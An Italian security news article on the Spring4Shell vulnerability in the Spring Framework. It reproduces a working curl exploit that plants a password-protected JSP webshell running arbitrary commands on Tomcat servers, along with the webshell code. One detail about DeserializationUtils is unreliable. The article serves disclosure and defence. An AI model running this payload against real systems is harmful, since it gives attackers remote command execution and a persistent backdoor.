Red Hot Cyber

Sicurezza informatica, cybercrime, hack
news, e altro ancora
  • English

Spring4Shell e SpringShell. Un’altra RCE che fa paura

Una vulnerabilità nel popolare framework Spring per lo sviluppo di applicazioni Web Java espone potenzialmente molte applicazioni Web ad attacchi informatici remoti.

La vulnerabilità, soprannominata Spring4Shell e SpringShell, ha suscitato grande scalpore tra gli esperti di sicurezza nelle ultime 24 ore.

In particolare, i ricercatori di sicurezza hanno cercato di capire se il problema è nuovo o deriva da una vulnerabilità precedente.

Di cosa si tratta

Secondo gli esperti di Praetorian e Flashpoint , la vulnerabilità è nuova e può essere sfruttata da remoto se l’applicazione Spring viene distribuita su un server Apache Tomcat con una configurazione comune.

Advertisements

Per sfruttare la vulnerabilità, un utente malintenzionato deve individuare e identificare le installazioni di applicazioni Web utilizzando DeserializationUtils. La vulnerabilità non interessa le applicazioni Spring che utilizzano Spring Boot e Tomcat incorporato.

Spring4Shell (a cui non è ancora stato assegnato un ID CVE) avrà probabilmente bisogno di un aggiornamento importante per garantire che le installazioni siano sicure, ha spiegato Richard Ford, direttore tecnico senior di Praetorian.

La vulnerabilità è molto facile da sfruttare, ha affermato Ford, e gli utenti dovranno installare gli aggiornamenti su cui Spring sta già lavorando il prima possibile. Secondo gli esperti di Flashpoint, non si discute ancora della vulnerabilità nella comunità dei criminali informatici.

Gli esperti di sicurezza delle informazioni sono venuti a conoscenza della vulnerabilità per la prima volta quando un ricercatore cinese ha pubblicato un tweet con uno screenshot di un attacco PoC.

Advertisements

Tuttavia, il tweet è stato presto cancellato, a quanto pare perché è un crimine in Cina pubblicare informazioni sulle vulnerabilità senza il permesso del governo. Su VX-Underground, le informazioni su Spring4Shell sono apparse a metà giornata del 30 marzo.

Avendo accesso agli screenshot, gli esperti di sicurezza sono stati in grado di decodificare l’exploit e riprodurre l’attacco in poche ore.

Uno sguardo all’exploit

La vulnerabilità sembra (A detta di Rapid7) interessare le funzioni che utilizzano l’ annotazione @RequestMapping e i parametri POJO (Plain Old Java Object). Ecco un esempio in una dimostrazione MVC di Springframework :

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

@Controller
public class HelloWorldController {

	@RequestMapping("/rapid7")
	public void vulnerable(HelloWorld model) {
	}
}

Un controller ( HelloWorldController), una volta caricato in Tomcat, gestirà le richieste HTTP a http://name/appname/rapid7. La funzione che gestisce la richiesta viene chiamata vulnerablee dispone di un parametro POJO HelloWorld. Qui, HelloWorldè ridotto ma POJO può essere piuttosto complicato se necessario:

Advertisements
package net.javaguides.springmvc.helloworld.model;

public class HelloWorld {
	private String message;
}

Questa è l’intera condizione sfruttabile, almeno dalle versioni di Spring Framework da 4.3.0 a 5.3.15. (Non sono state esplorate le versioni indietro alla 4.3.0.)

Se compiliamo il progetto e lo ospitiamo su Tomcat, possiamo quindi sfruttarlo con il seguente comando curl. Nota quanto segue utilizza esattamente lo stesso payload dalla PoC creata dal ricercatore cinese.

curl -v -d "class.module.classLoader.resources.context.parent.pipeline
.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%
22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt
ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%
20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20
while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7
D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context
.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources
.context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl
assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl
ass.module.classLoader.resources.context.parent.pipeline.first.fileDat
eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-
SNAPSHOT/rapid7

Questo payload rilascia una webshell protetta da password nella directory ROOT di Tomcat chiamata tomcatwar.jsp, e si presenta così:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in
= -.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.
println(new String(b)); } } -

Gli aggressori possono a questo punto invocare i comandi al server. 

Advertisements

Ecco un esempio di esecuzione whoamiper ottenere albinolobster:

La versione Java sembra avere importanza. 

Il test su OpenJDK 1.8.0_312 non riesce, ma OpenJDK 11.0.14.1 funziona.

Advertisements